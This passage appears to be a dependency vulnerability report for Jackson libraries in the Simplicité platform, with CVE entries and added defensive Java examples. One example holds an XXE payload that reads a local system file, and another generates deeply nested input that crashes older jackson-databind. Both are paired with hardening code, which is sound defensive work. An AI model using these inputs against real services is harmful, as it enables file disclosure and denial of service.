Evidence Type Source Name Value Confidence Vendor file name jackson-annotations High Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor Manifest bundle-docurl http://github.com/FasterXML/jackson Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-annotations Medium Vendor Manifest implementation-build-date 2020-07-21 01:31:06+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.core Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-annotations Highest Vendor pom artifactid jackson-annotations Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name Jackson-annotations High Vendor pom parent-artifactid jackson-parent Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url http://github.com/FasterXML/jackson Highest Product file name jackson-annotations High Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product Manifest bundle-docurl http://github.com/FasterXML/jackson Low Product Manifest Bundle-Name Jackson-annotations Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-annotations Medium Product Manifest implementation-build-date 2020-07-21 01:31:06+0000 Low Product Manifest Implementation-Title Jackson-annotations High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Jackson-annotations Medium Product pom artifactid jackson-annotations Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name Jackson-annotations High Product pom parent-artifactid jackson-parent Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url http://github.com/FasterXML/jackson Medium Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom parent-version 2.10.5 Low Version pom version 2.10.5 Highest
jackson-core-2.10.5.jarDescription:
Core Jackson processing abstractions (aka Streaming API), implementation for JSON License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.10.5/jackson-core-2.10.5.jar
MD5: 467e771df80da5f50fadb399f78f4ce1
SHA1: db2ba27938de7f2d478a97d6abcdaa17cbbd3cea
SHA256: 2656010d1e921ac69b76fc7e0c0f5a6b14aca62fa9603e78831e6148eb7c77ba
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-core High Vendor jar package name base Highest Vendor jar package name core Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor jar package name json Highest Vendor Manifest bundle-docurl https://github.com/FasterXML/jackson-core Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-core Medium Vendor Manifest implementation-build-date 2020-07-21 01:40:55+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.core Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-core Highest Vendor pom artifactid jackson-core Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name Jackson-core High Vendor pom parent-artifactid jackson-base Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url FasterXML/jackson-core Highest Product file name jackson-core High Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product jar package name base Highest Product jar package name core Highest Product jar package name fasterxml Highest Product jar package name filter Highest Product jar package name jackson Highest Product jar package name json Highest Product jar package name version Highest Product Manifest bundle-docurl https://github.com/FasterXML/jackson-core Low Product Manifest Bundle-Name Jackson-core Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-core Medium Product Manifest implementation-build-date 2020-07-21 01:40:55+0000 Low Product Manifest Implementation-Title Jackson-core High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Jackson-core Medium Product pom artifactid jackson-core Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name Jackson-core High Product pom parent-artifactid jackson-base Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url FasterXML/jackson-core High Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
CVE-2022-45688
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2023-5072
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
Both descriptions name other JSON libraries (hutool-json, and JSON-Java, i.e. org.json), not FasterXML jackson-core; the likely trigger is the generic "json" package-name evidence collected above rather than the com.fasterxml.jackson.core coordinates. Confirm the matched CPE in the Vulnerable Software list and, if it is not jackson-core, suppress both CVEs for this jar's SHA1 (db2ba27938de7f2d478a97d6abcdaa17cbbd3cea) with a note recording the reason, so the false positive does not mask the real findings against jackson-databind below.
jackson-core-asl-1.9.13.jarDescription:
Jackson is a high-performance JSON processor (parser, generator)
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/codehaus/jackson/jackson-core-asl/1.9.13/jackson-core-asl-1.9.13.jar
MD5: 319c49a4304e3fa9fe3cd8dcfc009d37
SHA1: 3c304d70f42f832e0a86d45bd437f692129299a4
SHA256: 440a9cb5ca95b215f953d3a20a6b1a10da1f09b529a9ddea5f8a4905ddab4f5a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-core-asl High Vendor jar package name codehaus Highest Vendor jar package name jackson Highest Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5, JavaSE-1.6 Low Vendor Manifest bundle-symbolicname jackson-core-asl Medium Vendor Manifest Implementation-Vendor http://fasterxml.com High Vendor Manifest specification-vendor http://www.ietf.org/rfc/rfc4627.txt Low Vendor pom artifactid jackson-core-asl Highest Vendor pom artifactid jackson-core-asl Low Vendor pom developer email tatu@fasterxml.com Low Vendor pom developer id cowtowncoder Medium Vendor pom developer name Tatu Saloranta Medium Vendor pom groupid org.codehaus.jackson Highest Vendor pom name Jackson High Vendor pom organization name FasterXML High Vendor pom organization url http://fasterxml.com Medium Vendor pom url http://jackson.codehaus.org Highest Product file name jackson-core-asl High Product jar package name codehaus Highest Product jar package name jackson Highest Product Manifest Bundle-Name Jackson JSON processor Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5, JavaSE-1.6 Low Product Manifest bundle-symbolicname jackson-core-asl Medium Product Manifest Implementation-Title Jackson JSON processor High Product Manifest specification-title JSON - JavaScript Object Notation Medium Product pom artifactid jackson-core-asl Highest Product pom developer email tatu@fasterxml.com Low Product pom developer id cowtowncoder Low Product pom developer name Tatu Saloranta Low Product pom groupid org.codehaus.jackson Highest Product pom name Jackson High Product pom organization name FasterXML Low Product pom organization url http://fasterxml.com Low Product pom url http://jackson.codehaus.org Medium Version file version 1.9.13 High Version Manifest Bundle-Version 1.9.13 High Version Manifest Implementation-Version 1.9.13 High Version pom version 1.9.13 Highest
jackson-databind-2.10.5.jarDescription:
General data-binding functionality for Jackson: works on core streaming API License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.10.5/jackson-databind-2.10.5.jar
MD5: 40a3ee2381813fdcfc6ad026e914ab0c
SHA1: 52414bbb464a2836c12649169930bed0c41e31a7
SHA256: 5e19fdaed7e0f2a37aa756d480879ae26926b9fc0d8270d78c4dcd5bf65a7a54
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-databind High Vendor jar package name databind Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor Manifest bundle-docurl http://github.com/FasterXML/jackson Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-databind Medium Vendor Manifest implementation-build-date 2020-07-21 01:52:01+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.core Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-databind Highest Vendor pom artifactid jackson-databind Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name jackson-databind High Vendor pom parent-artifactid jackson-base Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url http://github.com/FasterXML/jackson Highest Product file name jackson-databind High Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product jar package name databind Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product Manifest bundle-docurl http://github.com/FasterXML/jackson Low Product Manifest Bundle-Name jackson-databind Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-databind Medium Product Manifest implementation-build-date 2020-07-21 01:52:01+0000 Low Product Manifest Implementation-Title jackson-databind High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title jackson-databind Medium Product pom artifactid jackson-databind Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name jackson-databind High Product pom parent-artifactid jackson-base Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url http://github.com/FasterXML/jackson Medium Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
CVE-2020-25649
A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw exposes applications to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions:
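CVE-2017-9096 (iText 2.1.7, above) and CVE-2020-25649 (this jar) are the same defect class: an XML parser inside a library is left with external entity resolution enabled, so XML that arrives inside untrusted input (a crafted PDF for iText, a JSON string bound to a DOM node type through jackson-databind's DOMDeserializer) can read local files or make the server issue outbound requests. The block below is an added example and is not code from Simplicité, iText or Jackson. It builds a JAXP DocumentBuilderFactory with the OWASP-recommended features, shows a constructed DOCTYPE payload being refused by that factory, and contrasts it with the JDK default factory, which resolves the entity. The class name XxeHardening and the entity target file:///etc/hostname are assumptions chosen for illustration.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class XxeHardening {

    // Constructed sample payload (not taken from any real PDF or report): a DTD that
    // declares an external general entity and a document body that dereferences it.
    // file:///etc/hostname is an assumed target, chosen only because it exists on most
    // Linux hosts; a real attacker points it at secrets or an internal URL.
    static final String XXE_PAYLOAD =
          "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE form [<!ENTITY xxe SYSTEM \"file:///etc/hostname\">]>\n"
        + "<form><field>&xxe;</field></form>";

    // The JDK default: DOCTYPE accepted, external entities resolved. This is the
    // state both CVEs describe for the libraries' internal parsers.
    static DocumentBuilderFactory defaultFactory() {
        return DocumentBuilderFactory.newInstance();
    }

    // Hardened factory. Rejecting the DOCTYPE outright is the decisive setting; the
    // remaining features cover parsers that do not honour the first one.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    // Parse the payload and return the text of <field>, or null when the parser
    // refused the document (the hardened factory stops at the DOCTYPE declaration).
    static String fieldText(DocumentBuilderFactory f, String xml)
            throws ParserConfigurationException, IOException {
        try {
            DocumentBuilder b = f.newDocumentBuilder();
            Document d = b.parse(new InputSource(new StringReader(xml)));
            return d.getElementsByTagName("field").item(0).getTextContent();
        } catch (SAXException e) {
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Vulnerable configuration: the entity is dereferenced. Either the file content
        // comes back inside <field>, or the parser fails while trying to open the file,
        // which proves the same point on a host where the file does not exist.
        try {
            String leaked = fieldText(defaultFactory(), XXE_PAYLOAD);
            System.out.println("default factory, <field> now holds: " + leaked);
        } catch (IOException e) {
            System.out.println("default factory tried to read the entity target: " + e.getMessage());
        }

        // Hardened configuration: no file access happens because the document is
        // rejected before any entity is resolved.
        String guarded = fieldText(hardenedFactory(), XXE_PAYLOAD);
        System.out.println("hardened factory accepted the document: " + (guarded != null));
    }
}
```

The same feature set applies to SAXParserFactory and, via XMLInputFactory.SUPPORT_DTD / IS_SUPPORTING_EXTERNAL_ENTITIES, to StAX; a library that exposes none of these switches (as iText 2.1.7 does not) can only be fixed by replacing it.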
CVE-2020-36518
jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. CWE-787 Out-of-bounds Write
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2021-46877
jackson-databind 2.10.x through 2.12.x before 2.12.6 and 2.13.x before 2.13.1 allows attackers to cause a denial of service (2 GB transient heap usage per read) in uncommon situations involving JsonNode JDK serialization. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-42003
In FasterXML jackson-databind before versions 2.13.4.1 and 2.12.17.1, resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-42004
In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2023-35116
jackson-databind through 2.15.2 allows attackers to cause a denial of service or other unspecified impact via a crafted object that uses cyclic dependencies. NOTE: the vendor's perspective is that this is not a valid vulnerability report, because the steps of constructing a cyclic data structure and trying to serialize it cannot be achieved by an external attacker. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (4.7) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
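CVE-2020-36518, CVE-2022-42003 and CVE-2022-42004 above share one root cause: jackson-databind 2.10.5 recurses once per nesting level with no ceiling, so a request body consisting of a few thousand opening brackets (or, with UNWRAP_SINGLE_VALUE_ARRAYS enabled, wrapper arrays around a primitive) exhausts the thread stack before binding finishes. The block below is an added example and is not Simplicité's or Jackson's code. It assumes an upgrade to jackson-core and jackson-databind 2.15 or later, where StreamReadConstraints and its maxNestingDepth limit exist, and it also shows a depth guard written against the streaming API that runs on any 2.x jackson-core, for code paths that cannot upgrade yet. The class name NestingDepthGuard and the limit of 50 are assumptions; the limit should reflect the deepest document the application legitimately accepts.

```java
import java.io.IOException;
import com.fasterxml.jackson.core.JsonFactory;
import com.fasterxml.jackson.core.JsonParser;
import com.fasterxml.jackson.core.JsonToken;
import com.fasterxml.jackson.core.StreamReadConstraints;
import com.fasterxml.jackson.core.exc.StreamConstraintsException;
import com.fasterxml.jackson.databind.DeserializationFeature;
import com.fasterxml.jackson.databind.ObjectMapper;

public class NestingDepthGuard {

    // Assumed application limit; 2.15 defaults to 1000 if nothing is configured.
    static final int MAX_DEPTH = 50;

    // Constructed payload: `depth` opening brackets, a scalar, `depth` closing ones.
    // This is the shape behind CVE-2020-36518; wrapped around a scalar and bound to a
    // primitive with UNWRAP_SINGLE_VALUE_ARRAYS it is the CVE-2022-42003 shape.
    static String nestedArrays(int depth, String innermost) {
        StringBuilder sb = new StringBuilder(depth * 2 + innermost.length());
        for (int i = 0; i < depth; i++) sb.append('[');
        sb.append(innermost);
        for (int i = 0; i < depth; i++) sb.append(']');
        return sb.toString();
    }

    // Pre-upgrade guard usable on jackson-core 2.10.5: a single non-recursive pass over
    // the token stream, counting START_* and END_* tokens, run before the payload is
    // handed to databind. Returns as soon as the limit is crossed.
    static boolean exceedsDepth(String json, int limit, JsonFactory factory) throws IOException {
        int depth = 0;
        try (JsonParser p = factory.createParser(json)) {
            for (JsonToken t = p.nextToken(); t != null; t = p.nextToken()) {
                if (t.isStructStart() && ++depth > limit) return true;
                if (t.isStructEnd()) depth--;
            }
        }
        return false;
    }

    // Post-upgrade fix (2.15+): the limit lives in the JsonFactory, so the parser
    // itself stops at MAX_DEPTH before any databind recursion takes place, and every
    // ObjectMapper built on the factory inherits it.
    static ObjectMapper boundedMapper() {
        JsonFactory factory = JsonFactory.builder()
            .streamReadConstraints(StreamReadConstraints.builder()
                .maxNestingDepth(MAX_DEPTH)
                .build())
            .build();
        ObjectMapper m = new ObjectMapper(factory);
        // Keep the feature CVE-2022-42003 depends on switched on, to show the parser
        // limit protects it too.
        m.enable(DeserializationFeature.UNWRAP_SINGLE_VALUE_ARRAYS);
        return m;
    }

    public static void main(String[] args) throws IOException {
        String benign = nestedArrays(3, "1");           // [[[1]]]
        String hostile = nestedArrays(100_000, "1");    // deep enough to overflow the stack in 2.10.5 databind

        // 1. Streaming guard on a plain factory, no version-specific API needed.
        JsonFactory plain = new JsonFactory();
        System.out.println("benign exceeds limit:  " + exceedsDepth(benign, MAX_DEPTH, plain));
        System.out.println("hostile exceeds limit: " + exceedsDepth(hostile, MAX_DEPTH, plain));

        // 2. Bounded mapper: a single wrapper array still unwraps, deep nesting is refused
        //    by the parser with StreamConstraintsException rather than a StackOverflowError.
        ObjectMapper mapper = boundedMapper();
        System.out.println("single wrapper unwrapped to: " + mapper.readValue("[7]", Integer.class));
        System.out.println("benign tree: " + mapper.readTree(benign));
        try {
            mapper.readTree(hostile);
            System.out.println("hostile tree accepted: constraints are not in effect on this Jackson version");
        } catch (StreamConstraintsException e) {
            System.out.println("hostile tree rejected: " + e.getOriginalMessage());
        }
    }
}
```

The streaming guard costs one extra parse of the body, so it belongs at the edge (a servlet filter or the REST layer) rather than in every deserializer; the StreamReadConstraints route has no such cost and is the one to keep once the upgrade is in.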
jackson-dataformat-csv-2.10.5.jarDescription:
Support for reading and writing CSV-encoded data via Jackson
abstractions.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/dataformat/jackson-dataformat-csv/2.10.5/jackson-dataformat-csv-2.10.5.jar
MD5: 6e3bc88152fdedb3207e760c5de00e9e
SHA1: 2fdba33036a74540f59ec21f956a3a5427e1c9db
SHA256: 573325172f7919399ab9a6f81d1c05d746cfc45e74bb211e01b2ecf92f96481a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-dataformat-csv High Vendor jar package name csv Highest Vendor jar package name dataformat Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor Manifest bundle-docurl https://github.com/FasterXML/jackson-dataformats-text Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.dataformat.jackson-dataformat-csv Medium Vendor Manifest implementation-build-date 2020-07-21 03:31:04+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.dataformat Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-dataformat-csv Highest Vendor pom artifactid jackson-dataformat-csv Low Vendor pom groupid com.fasterxml.jackson.dataformat Highest Vendor pom name Jackson-dataformat-CSV High Vendor pom parent-artifactid jackson-dataformats-text Low Vendor pom url FasterXML/jackson-dataformats-text Highest Product file name jackson-dataformat-csv High Product jar package name csv Highest Product jar package name dataformat Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product Manifest bundle-docurl https://github.com/FasterXML/jackson-dataformats-text Low Product Manifest Bundle-Name Jackson-dataformat-CSV Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.dataformat.jackson-dataformat-csv Medium Product Manifest implementation-build-date 2020-07-21 03:31:04+0000 Low Product Manifest Implementation-Title Jackson-dataformat-CSV High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Jackson-dataformat-CSV Medium Product pom artifactid jackson-dataformat-csv Highest Product pom groupid com.fasterxml.jackson.dataformat Highest Product pom name Jackson-dataformat-CSV High Product pom parent-artifactid jackson-dataformats-text Medium Product pom url FasterXML/jackson-dataformats-text High Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
Related Dependencies:
jackson-dataformat-xml-2.10.5.jar File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/dataformat/jackson-dataformat-xml/2.10.5/jackson-dataformat-xml-2.10.5.jar MD5: e936b010d951c5a5a8a2c48f74326431 SHA1: eb44e5de7ba75ef1b6e2c8caa09b0d5e153cb24f SHA256: e959cd5c81a35cf23cd8e55ee02af25da10f912dc0b3662e81d43c993b8e4471 pkg:maven/com.fasterxml.jackson.dataformat/jackson-dataformat-xml@2.10.5
jackson-dataformat-yaml-2.10.5.jar File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/dataformat/jackson-dataformat-yaml/2.10.5/jackson-dataformat-yaml-2.10.5.jar MD5: e38b555128a6e3d3d437df2b451061d5 SHA1: 86b10f913c64fc4927579e709fc8eb99e9a9e9ce SHA256: 4995abe8b7c943dd0532be3f890ee9ad2b3f6059cca22dc241d72ad337454951 pkg:maven/com.fasterxml.jackson.dataformat/jackson-dataformat-yaml@2.10.5
jackson-datatype-guava-2.10.5.jarDescription:
Add-on datatype-support module for Jackson (https://github.com/FasterXML/jackson) that handles
Guava (http://code.google.com/p/guava-libraries/) types (currently mostly just collection ones)
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-guava/2.10.5/jackson-datatype-guava-2.10.5.jar
MD5: d9451b1397aa6e288892c425d999bd55
SHA1: a8b0a978c18ab51006a0ef03ba2b2c156b92b1d8
SHA256: a42d52513f39a77a6481ab1e03b0f42874502c7b7c9dc5116819b1d78175d3fe
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-datatype-guava High Vendor jar package name datatype Highest Vendor jar package name fasterxml Highest Vendor jar package name guava Highest Vendor jar package name jackson Highest Vendor Manifest bundle-docurl https://github.com/FasterXML/jackson-datatypes-collections Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.datatype.jackson-datatype-guava Medium Vendor Manifest implementation-build-date 2020-07-21 03:48:08+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.datatype Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-datatype-guava Highest Vendor pom artifactid jackson-datatype-guava Low Vendor pom groupid com.fasterxml.jackson.datatype Highest Vendor pom name Jackson datatype: Guava High Vendor pom parent-artifactid jackson-datatypes-collections Low Vendor pom url FasterXML/jackson-datatypes-collections Highest Product file name jackson-datatype-guava High Product jar package name datatype Highest Product jar package name fasterxml Highest Product jar package name guava Highest Product jar package name jackson Highest Product Manifest bundle-docurl https://github.com/FasterXML/jackson-datatypes-collections Low Product Manifest Bundle-Name Jackson datatype: Guava Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.datatype.jackson-datatype-guava Medium Product Manifest implementation-build-date 2020-07-21 03:48:08+0000 Low Product Manifest Implementation-Title Jackson datatype: Guava High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Jackson datatype: Guava Medium Product pom artifactid jackson-datatype-guava Highest Product pom groupid com.fasterxml.jackson.datatype Highest Product pom name Jackson datatype: Guava High Product pom parent-artifactid jackson-datatypes-collections Medium Product pom url FasterXML/jackson-datatypes-collections High Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
jackson-datatype-joda-2.10.5.jar
Description: Add-on module for Jackson (http://jackson.codehaus.org) to support Joda (http://joda-time.sourceforge.net/) data types.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-joda/2.10.5/jackson-datatype-joda-2.10.5.jar
MD5: 87c36914caee49ec19b6deb12535bb1d
SHA1: b6ad58040fe4987b8abbdb7a22114382c8df5dda
SHA256: da4ee5119e4dd63c35bc3e27a712999d15d465144dc127f97278435491aff775
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jackson-datatype-joda | High
Vendor | jar | package name | datatype | Highest
Vendor | jar | package name | fasterxml | Highest
Vendor | jar | package name | jackson | Highest
Vendor | jar | package name | joda | Highest
Vendor | Manifest | bundle-docurl | http://wiki.fasterxml.com/JacksonModuleJoda | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.jackson.datatype.jackson-datatype-joda | Medium
Vendor | Manifest | implementation-build-date | 2020-07-21 03:42:50+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.jackson.datatype | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | jackson-datatype-joda | Highest
Vendor | pom | artifactid | jackson-datatype-joda | Low
Vendor | pom | groupid | com.fasterxml.jackson.datatype | Highest
Vendor | pom | name | Jackson-datatype-Joda | High
Vendor | pom | parent-artifactid | jackson-base | Low
Vendor | pom | parent-groupid | com.fasterxml.jackson | Medium
Vendor | pom | url | http://wiki.fasterxml.com/JacksonModuleJoda | Highest
Product | file | name | jackson-datatype-joda | High
Product | jar | package name | datatype | Highest
Product | jar | package name | fasterxml | Highest
Product | jar | package name | jackson | Highest
Product | jar | package name | joda | Highest
Product | Manifest | bundle-docurl | http://wiki.fasterxml.com/JacksonModuleJoda | Low
Product | Manifest | Bundle-Name | Jackson-datatype-Joda | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.jackson.datatype.jackson-datatype-joda | Medium
Product | Manifest | implementation-build-date | 2020-07-21 03:42:50+0000 | Low
Product | Manifest | Implementation-Title | Jackson-datatype-Joda | High
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Product | Manifest | specification-title | Jackson-datatype-Joda | Medium
Product | pom | artifactid | jackson-datatype-joda | Highest
Product | pom | groupid | com.fasterxml.jackson.datatype | Highest
Product | pom | name | Jackson-datatype-Joda | High
Product | pom | parent-artifactid | jackson-base | Medium
Product | pom | parent-groupid | com.fasterxml.jackson | Medium
Product | pom | url | http://wiki.fasterxml.com/JacksonModuleJoda | Medium
Version | file | version | 2.10.5 | High
Version | Manifest | Bundle-Version | 2.10.5 | High
Version | Manifest | Implementation-Version | 2.10.5 | High
Version | pom | version | 2.10.5 | Highest
jackson-jaxrs-base-2.10.5.jar
Description: Pile of code that is shared by all Jackson-based JAX-RS providers.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/jaxrs/jackson-jaxrs-base/2.10.5/jackson-jaxrs-base-2.10.5.jar
MD5: 5aa5208b0f40ed929cc1d5558d2219b2
SHA1: 2c0c330f121ca5396560a692113c8339f7aac9b5
SHA256: 98f27188fa2a72ef5d3f85fab6e6ca0e76bde1a58c9396cb1cf91028080435d6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jackson-jaxrs-base | High
Vendor | jar | package name | base | Highest
Vendor | jar | package name | fasterxml | Highest
Vendor | jar | package name | jackson | Highest
Vendor | jar | package name | jaxrs | Highest
